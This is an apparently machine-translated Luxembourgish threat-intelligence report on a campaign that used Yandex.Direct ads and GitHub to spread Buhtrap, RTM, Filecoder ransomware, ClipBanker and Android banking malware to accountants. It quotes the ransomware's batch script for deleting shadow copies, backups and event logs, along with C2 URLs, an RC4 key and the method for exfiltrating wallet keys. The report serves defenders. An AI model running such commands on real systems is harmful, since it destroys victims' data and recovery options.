Fir Comptabelen an engem Cyberattack ze zielen, kënnt Dir Aarbechtsdokumenter benotzen, déi se online sichen. Dëst ass ongeféier wat eng Cyber Grupp an de leschte Méint gemaach huet, bekannte Backdoors verdeelt. и , souwéi Verschlësseler a Software fir Krypto-Währungen ze klauen. Déi meescht Ziler sinn a Russland. D'Attack gouf duerch d'Plaze vun béiswëlleg Reklammen op Yandex.Direct duerchgefouert. Potenziell Affer goufen op eng Websäit geleet, wou se gefrot goufen eng béiswëlleg Datei erofzelueden, déi als Dokumentschabloun verkleed ass. Yandex huet déi béiswëlleg Reklamm no eiser Warnung ewechgeholl.
Dem Buhtrap säi Quellcode gouf an der Vergaangenheet online geläscht sou datt jidderee se benotze kann. Mir hu keng Informatioun iwwer RTM Code Disponibilitéit.
An dësem Post wäerte mir Iech soen wéi d'Attacker Malware mat Yandex.Direct verdeelt hunn an et op GitHub gehost hunn. De Post schléisst mat enger technescher Analyse vun der Malware of.
Buhtrap an RTM sinn zréck am Betrib
Mechanismus vun Verbreedung an Affer
Déi verschidde Notzlaascht, déi un d'Affer geliwwert ginn, deelen e gemeinsame Verbreedungsmechanismus. All béiswëlleg Dateien, déi vun den Ugräifer erstallt goufen, goufen an zwee verschidde GitHub Repositories gesat.
Typesch huet de Repository eng erofgeluede béisaarteg Datei, déi dacks geännert huet. Zënter GitHub erlaabt Iech d'Geschicht vun Ännerungen an engem Repository ze gesinn, kënne mir gesinn wat Malware während enger gewësser Period verdeelt gouf. Fir d'Affer ze iwwerzeegen fir d'béisaarteg Datei erofzelueden, gouf d'Websäit blanki-shabloni24[.]ru, déi an der Figur uewen ugewise gëtt, benotzt.
Den Design vum Site an all d'Nimm vun de béisaarteg Fichieren no engem eenzege Konzept - Formen, Templates, Kontrakter, Echantillon, etc. Bedenkt datt Buhtrap an RTM Software schonn an Attacken op Comptabelen an der Vergaangenheet benotzt goufen, hu mir ugeholl, datt de Strategie an der neier Campagne ass déiselwecht. Déi eenzeg Fro ass wéi d'Affer op d'Säit vun den Ugräifer ukomm ass.
Infektioun
Op d'mannst e puer potenziell Affer, déi op dësem Site opgehalen hunn, goufen duerch béiswëlleg Reklamm ugezunn. Drënner ass eng Beispill URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Wéi Dir aus dem Link kënnt gesinn, gouf de Banner um legitimen Comptablesmethod Forum bb.f2[.]kz gepost. Et ass wichteg ze notéieren, datt d'Banerer op verschiddene Siten erschéngen, all haten déi selwecht Campagne ID (blanki_rsya), an am meeschten Zesummenhang mat Comptablesmethod oder juristesch Hëllef Servicer. D'URL weist datt de potenziellen Affer d'Ufro "Download Rechnungsformular" benotzt huet, déi eis Hypothese vu geziilten Attacken ënnerstëtzt. Drënner sinn d'Siten wou d'Banner erschéngen an déi entspriechend Sichufroen.
- download Rechnung Form - bb.f2[.]kz
- Prouf Kontrakt - Ipopen[.]ru
- Applikatioun Plainte Prouf - 77metrov[.]ru
- Accord Form - eidel-dogovor-kupli-prodazhi[.]ru
- Prouf Geriicht Petitioun - zen.yandex[.]ru
- Prouf Plainte - yurday [.]ru
- Beispill Kontrakt Formen - Regforum[.]ru
- Kontraktform – assistentus[.]ru
- Prouf Appartement Accord - napravah[.]com
- Echantillon vun legal Kontrakter - avito[.]ru
D'blanki-shabloni24[.]ru Site hu vläicht konfiguréiert fir eng einfach visuell Bewäertung ze passéieren. Typesch, eng Annonce déi op eng professionell ausgesinn Site weist mat engem Link op GitHub schéngt net wéi eppes offensichtlech schlecht. Zousätzlech hunn d'Attacker béiswëlleg Dateien op de Repository eropgelueden nëmme fir eng limitéiert Period, méiglecherweis während der Campagne. Déi meescht vun der Zäit huet de GitHub Repository en eidelen Zip-Archiv oder eng eidel EXE-Datei enthalen. Sou konnten Ugräifer Reklammen iwwer Yandex.Direct op Siten verdeelen, déi héchstwahrscheinlech vu Comptabelen besicht goufen, déi an Äntwert op spezifesch Sichufroe koumen.
Als nächst kucke mer déi verschidde Notzlaascht op dës Manéier verdeelt.
Notzlaascht Analyse
Chronologie vun der Verdeelung
Déi béiswëlleg Campagne huet Enn Oktober 2018 ugefaang an ass aktiv am Schreiwen. Well de ganze Repository ëffentlech op GitHub verfügbar war, hu mir eng genee Timeline vun der Verdeelung vu sechs verschidde Malwarefamilljen zesummegestallt (kuckt d'Figur hei ënnen). Mir hunn eng Zeil bäigefüügt, déi weist wéini de Bannerlink entdeckt gouf, wéi gemooss vun der ESET Telemetrie, fir de Verglach mat der Git Geschicht. Wéi Dir gesitt, korreléiert dëst gutt mat der Disponibilitéit vun der Notzlaascht op GitHub. D'Diskrepanz Enn Februar kann erkläert ginn duerch d'Tatsaach datt mir keen Deel vun der Ännerungsgeschicht hunn, well de Repository aus GitHub geläscht gouf ier mer et voll konnten kréien.
Figur 1. Chronologie vun malware Verdeelung.
Code Ënnerschrëft Certificaten
D'Campagne huet verschidde Certificaten benotzt. E puer goufe vu méi wéi enger Malwarefamill ënnerschriwwen, wat weider weist datt verschidde Proben zur selwechter Kampagne gehéiert. Trotz der Disponibilitéit vum private Schlëssel hunn d'Betreiber net systematesch d'Binären ënnerschriwwen an de Schlëssel net fir all Proben benotzt. Enn Februar 2019 hunn Ugräifer ugefaang ongëlteg Ënnerschrëften ze kreéieren mat engem Google-Besëtz Zertifika fir deen se net de private Schlëssel hunn.
All Certificaten déi an der Kampagne involvéiert sinn an d'Malwarefamilljen déi se ënnerschreiwen sinn an der Tabell hei ënnen opgezielt.
Mir hunn och dës Code Ënnerschrëft Certificaten benotzt fir Links mat anere Malware Famillen opzebauen. Fir déi meescht Certificaten hu mir keng Proben fonnt déi net iwwer e GitHub Repository verdeelt goufen. Wéi och ëmmer, den TOV "MARIYA" Zertifika gouf benotzt fir Malware ze ënnerschreiwen déi zum Botnet gehéiert , Adware a Miner. Et ass onwahrscheinlech datt dës Malware mat dëser Kampagne verbonnen ass. Wahrscheinlech gouf den Zertifika um Darknet kaaft.
Win32/Filecoder.Buhtrap
Déi éischt Komponent, déi eis opmierksam gemaach huet, war den nei entdeckten Win32/Filecoder.Buhtrap. Dëst ass eng Delphi binär Datei déi heiansdo verpackt ass. Et gouf haaptsächlech am Februar-Mäerz 2019 verdeelt. Et behält sech wéi et e Ransomware Programm passt - et sicht lokal Fuerwen an Netzwierkdateien a verschlësselt déi entdeckt Dateien. Et brauch keng Internetverbindung fir kompromittéiert ze ginn, well et net mam Server kontaktéiert fir Verschlësselungsschlësselen ze schécken. Amplaz füügt et e "Token" un d'Enn vun der Léisegeldmeldung, a proposéiert E-Mail oder Bitmessage ze benotzen fir Betreiber ze kontaktéieren.
Fir sou vill sensibel Ressourcen wéi méiglech ze verschlësselen, leeft de Filecoder.Buhtrap e Fuedem, deen entwéckelt ass fir Schlësselsoftware auszeschalten, déi oppe Dateihandterer hunn, déi wäertvoll Informatioun enthalen, déi d'Verschlësselung stéieren kënnen. D'Zilprozesser sinn haaptsächlech Datebankmanagementsystemer (DBMS). Zousätzlech läscht Filecoder.Buhtrap Logdateien a Backups fir d'Datenerhuelung méi schwéier ze maachen. Fir dëst ze maachen, lafen de Batch-Skript hei ënnen.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap benotzt e legitimen Online IP Logger Service entwéckelt fir Informatioun iwwer Websäite Besucher ze sammelen. Dëst ass geduecht fir Affer vun der Ransomware ze verfolgen, wat d'Verantwortung vun der Kommandozeil ass:
mshta.exe "javascript:document.write('');"
Dateien fir Verschlësselung ginn ausgewielt wa se net mat dräi Ausgrenzungslëschte passen. Als éischt sinn Dateie mat de folgenden Extensiounen net verschlësselt: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys an .Fliedermaus. Zweetens, all Dateie fir déi de komplette Wee Verzeechnes Saiten aus der Lëscht hei drënner enthält sinn ausgeschloss.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Drëttens, bestëmmte Dateinumm sinn och vun der Verschlësselung ausgeschloss, dorënner de Dateinumm vun der Léisegeldmeldung. D'Lëscht gëtt ënnendrënner presentéiert. Selbstverständlech sinn all dës Ausnahmen geduecht fir d'Maschinn ze halen, awer mat minimaler Verkéiersfäegkeet.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Dateverschlësselung Schema
Eemol ausgefouert, generéiert de Malware e 512-Bit RSA Schlësselpaar. De private Exponent (d) a Modulus (n) ginn dann verschlësselt mat engem hartkodéierten 2048-Bit ëffentleche Schlëssel (ëffentlech Exponent a Modulus), zlib-gepackt a base64 kodéiert. De Code verantwortlech fir dëst gëtt an der Figur 2 gewisen.
Figur 2. Resultat vun Hex-Strahlen decompilation vun der 512-bëssen RSA Schlëssel Puer Generatioun Prozess.
Drënner ass e Beispill vu Kloertext mat engem generéierte private Schlëssel, deen en Token ass mat der Léisegeldmeldung verbonnen.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Den ëffentleche Schlëssel vun den Ugräifer gëtt hei ënnen uginn.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
D'Dateie gi verschlësselt mat AES-128-CBC mat engem 256-Bit Schlëssel. Fir all verschlësselte Fichier gëtt en neie Schlëssel an en neien Initialisierungsvektor generéiert. D'Schlësselinformatioun gëtt um Enn vun der verschlësselter Datei bäigefüügt. Loosst eis d'Format vun der verschlësselter Datei betruechten.
Verschlësselte Dateien hunn de folgenden Header:
D'Quelldateien mat der Zousatz vum VEGA Magiewäert sinn op déi éischt 0x5000 Bytes verschlësselt. All Entschlësselungsinformatioun ass mat enger Datei mat der folgender Struktur befestegt:
- D'Dateigréisst Marker enthält e Mark deen ugeet ob d'Datei méi grouss ass wéi 0x5000 Bytes an der Gréisst
- AES Schlësselblob = ZlibCompress(RSAencrypt(AES Schlëssel + IV, ëffentleche Schlëssel vum generéierten RSA Schlësselpaar))
- RSA Schlëssel blob = ZlibCompress (RSAencrypt (generéiert RSA private Schlëssel, schwéier-kodéiert RSA ëffentleche Schlëssel))
Win32/ClipBanker
Win32 / ClipBanker ass e Komponent deen intermittent vu Enn Oktober bis Ufank Dezember 2018 verdeelt gouf. Seng Roll ass den Inhalt vum Clipboard ze iwwerwaachen, et sicht Adresse vu Krypto-Währung Portemonnaien. Nodeems Dir d'Zil-Portemonnaie-Adress bestëmmt huet, ersetzt ClipBanker et mat enger Adress, déi gegleeft datt se zu den Opérateuren gehéieren. D'Proben, déi mir iwwerpréift hunn, ware weder verpackt nach verschmëlzt. Deen eenzege Mechanismus deen benotzt gëtt fir Verhalen ze maskéieren ass Stringverschlësselung. Bedreiwer Portemonnaie Adressen sinn verschlësselte benotzt RC4. Zil-Krypto-Währungen sinn Bitcoin, Bitcoin Cash, Dogecoin, Ethereum a Ripple.
Wärend der Period huet d'Malware op d'Bitcoin Portemonnaie vun den Ugräifer verbreet, e klenge Betrag gouf op VTS geschéckt, wat Zweifel iwwer den Erfolleg vun der Kampagne stellt. Zousätzlech gëtt et kee Beweis fir ze suggeréieren datt dës Transaktioune guer mam ClipBanker verbonne sinn.
Win32/RTM
De Win32/RTM Komponent gouf fir e puer Deeg am Ufank Mäerz 2019 verdeelt. RTM ass en Trojanesche Banker geschriwwen zu Delphi, riicht op Fernbankesystemer. Am 2017 hunn ESET Fuerscher publizéiert vun dësem Programm ass d'Beschreiwung nach ëmmer relevant. Am Januar 2019, Palo Alto Networks och verëffentlecht .
Buhtrap Loader
Fir eng Zäit war en Downloader op GitHub verfügbar, deen net ähnlech wéi fréier Buhtrap Tools war. Hien dréit sech op https://94.100.18[.]67/RSS.php?<some_id> fir déi nächst Etapp ze kréien a lued se direkt an d'Erënnerung. Mir kënnen zwee Verhalen vun der zweeter Stuf Code z'ënnerscheeden. An der éischter URL huet RSS.php d'Buhtrap Backdoor direkt iwwerginn - dës Backdoor ass ganz ähnlech wéi déi verfügbar nodeems de Quellcode geläscht gouf.
Interessanterweis gesi mir verschidde Kampagnen mat der Buhtrap Backdoor, a si ginn angeblech vu verschiddene Betreiber geleet. An dësem Fall ass den Haaptunterschied datt d'Backdoor direkt an d'Erënnerung gelueden ass an net den übleche Schema mam DLL-Deploymentprozess benotzt, iwwer dee mir geschwat hunn . Zousätzlech hunn d'Betreiber den RC4 Schlëssel geännert fir den Netzverkéier op den C&C Server ze verschlësselen. An de meeschte Campagnen déi mir gesinn hunn, hunn d'Bedreiwer net gestéiert dëse Schlëssel z'änneren.
Dat zweet, méi komplext Verhalen war datt d'RSS.php URL un en anere Loader weidergeleet gouf. Et huet e puer Verdueblung ëmgesat, sou wéi d'Opbau vun der dynamescher Importtabelle. Den Zweck vum Bootloader ass de C&C Server ze kontaktéieren [.]com/api/F27F84EDA4D13B15/2, schéckt d'Logbicher a waart op eng Äntwert. Et veraarbecht d'Äntwert als Blob, lued se an d'Erënnerung an fiert se aus. D'Notzlaascht, déi mir gesinn hunn dës Luede auszeféieren, war déiselwecht Buhtrap Backdoor, awer et kënnen aner Komponenten sinn.
Android / Spy.Banker
Interessanterweis gouf e Komponent fir Android och am GitHub Repository fonnt. Hie war nëmmen een Dag an der Haaptbranche - den 1. November 2018. Ausser op GitHub gepost, fënnt ESET Telemetrie keng Beweiser datt dës Malware verdeelt gëtt.
De Komponent gouf als Android Application Package (APK) gehost. Et ass staark verstoppt. Dat béiswëlleg Verhalen ass an engem verschlësselte JAR verstoppt an der APK. Et ass verschlësselt mat RC4 mat dësem Schlëssel:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Dee selwechte Schlëssel an Algorithmus gi benotzt fir Strings ze verschlësselen. JAR ass an APK_ROOT + image/files. Déi éischt 4 Bytes vun der Datei enthalen d'Längt vum verschlësselte JAR, deen direkt nom Längtfeld ufänkt.
Nodeems mir d'Datei entschlësselt hunn, hu mir entdeckt datt et Anubis war - virdrun Banker fir Android. De Malware huet déi folgend Features:
- Mikrofonopnam
- Screenshots huelen
- GPS Koordinaten kréien
- keylogger
- Apparat Dateverschlësselung an Léisegeld Nofro
- schéckt Spam
Interessanterweis huet de Banquier Twitter als Backup-Kommunikatiounskanal benotzt fir en anere C&C-Server ze kréien. D'Probe déi mir analyséiert hunn huet den @JonesTrader Kont benotzt, awer zum Zäitpunkt vun der Analyse war et scho blockéiert.
De Banquier enthält eng Lëscht vun Zil Uwendungen op der Android Apparat. Et ass méi laang wéi d'Lëscht an der Sophos Studie kritt. D'Lëscht enthält vill Bankapplikatiounen, Online Shopping Programmer wéi Amazon an eBay, a cryptocurrency Servicer.
MSIL/ClipBanker.IH
Déi lescht Komponent, déi als Deel vun dëser Campagne verdeelt gouf, war den .NET Windows ausféierbar, deen am Mäerz 2019 erschéngt. Déi meescht vun de studéierte Versioune ware mat ConfuserEx v1.0.0 verpackt. Wéi ClipBanker benotzt dës Komponent de Clipboard. Säin Zil ass eng breet Palette vu Krypto-Währungen, souwéi Offeren op Steam. Zousätzlech benotzt hien den IP Logger Service fir de Bitcoin private WIF Schlëssel ze klauen.
Schutz Mechanismen
Zousätzlech zu de Virdeeler déi ConfuserEx ubitt fir Debugging, Dumping a Tamperen ze vermeiden, enthält de Komponent d'Fäegkeet Antivirus Produkter a virtuelle Maschinnen z'entdecken.
Fir z'iwwerpréiwen datt et an enger virtueller Maschinn leeft, benotzt d'Malware déi agebaute Windows WMI Kommandozeil (WMIC) fir BIOS Informatioun ze froen, nämlech:
wmic bios
Dann parséiert de Programm de Kommandoausgang a sicht Schlësselwierder: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Fir Antivirus Produkter z'entdecken, schéckt Malware eng Windows Management Instrumentation (WMI) Ufro un de Windows Security Center benotzt ManagementObjectSearcher API wéi ënnendrënner gewisen. Nom Dekodéierung vun der Base64 gesäit den Uruff esou aus:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Figur 3. Prozess fir z'identifizéieren Antivirus Produiten.
Zousätzlech kontrolléiert d'Malware ob , e Tool fir géint Clipboardattacken ze schützen an, wann se lafen, all Threads an deem Prozess suspendéiert, an doduerch de Schutz auszeschalten.
Persistenz
D'Versioun vu Malware, déi mir studéiert hunn, kopéiert sech selwer %APPDATA%googleupdater.exe a setzt de "verstoppte" Attribut fir de Google Verzeichnis. Da ännert se de Wäert SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell am Windows Registry a füügt de Wee un updater.exe. Op dës Manéier gëtt d'Malware ausgefouert all Kéier wann de Benotzer aloggen.
Béiswëlleg Verhalen
Wéi ClipBanker, iwwerwaacht d'Malware den Inhalt vum Clipboard a sicht no Krypto-Währung Portemonnaie Adressen, a wann et fonnt gëtt, ersetzt se mat enger vun den Adressen vum Bedreiwer. Drënner ass eng Lëscht vun Ziladressen baséiert op deem wat am Code fonnt gëtt.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Fir all Typ vun Adress gëtt et en entspriechende reguläre Ausdrock. De STEAM_URL Wäert gëtt benotzt fir den Steam System z'attackéieren, wéi aus dem reguläre Ausdrock gesi ka ginn, dee benotzt gëtt fir am Puffer ze definéieren:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Exfiltratioun Kanal
Zousätzlech fir d'Adressen am Puffer z'ersetzen, zielt d'Malware op déi privat WIF Schlësselen vu Bitcoin, Bitcoin Core an Electrum Bitcoin Portemonnaien. De Programm benotzt plogger.org als Exfiltratiounskanal fir de WIF private Schlëssel ze kréien. Fir dëst ze maachen, fügen d'Betreiber privat Schlësseldaten un den User-Agent HTTP Header, wéi hei ënnendrënner.
Figur 4. IP Logger Konsol mat Ausgangsdaten.
D'Operateuren hunn net iplogger.org benotzt fir Portemonnaie ze exfiltréieren. Si hu méiglecherweis op eng aner Method wéinst der 255 Charakterlimit am Feld zréckgezunn User-Agentan der IP Logger Web Interface ugewisen. An de Proben, déi mir studéiert hunn, gouf den aneren Ausgangsserver an der Ëmfeldvariabel gespäichert DiscordWebHook. Iwwerraschend ass dës Ëmfeldvariabel néierens am Code zougewisen. Dëst hindeit datt d'Malware nach ëmmer an der Entwécklung ass an d'Variabel ass dem Bedreiwer seng Testmaschinn zougewisen.
Et gëtt en anert Zeechen datt de Programm an der Entwécklung ass. D'binär Datei enthält zwee iplogger.org URLen, a béid gi gefrot wann d'Donnéeën exfiltréiert ginn. An enger Ufro un eng vun dësen URLen gëtt de Wäert am Refererfeld vun "DEV /" virausgesat. Mir hunn och eng Versioun fonnt déi net mat ConfuserEx verpackt gouf, den Empfänger fir dës URL heescht DevFeedbackUrl. Baséierend op den Ëmweltverännerlechen Numm, gleewen mir datt d'Bedreiwer plangen de legitimen Service Discord a säi Web-Interceptiounssystem ze benotzen fir Krypto-Währung Portemonnaien ze klauen.
Konklusioun
Dës Campagne ass e Beispill fir d'Benotzung vu legitime Reklammservicer bei Cyberattacken. De Schema zielt op russesch Organisatiounen, awer mir wären net iwwerrascht, sou en Ugrëff ze gesinn mat net-russesche Servicer. Fir Kompromëss ze vermeiden, mussen d'Benotzer zouversiichtlech sinn an de Ruff vun der Quell vun der Software déi se eroflueden.
Eng komplett Lëscht vu MITER ATT&CK Indikatoren vu Kompromëss an Attributer ass verfügbar op .
Source: will.com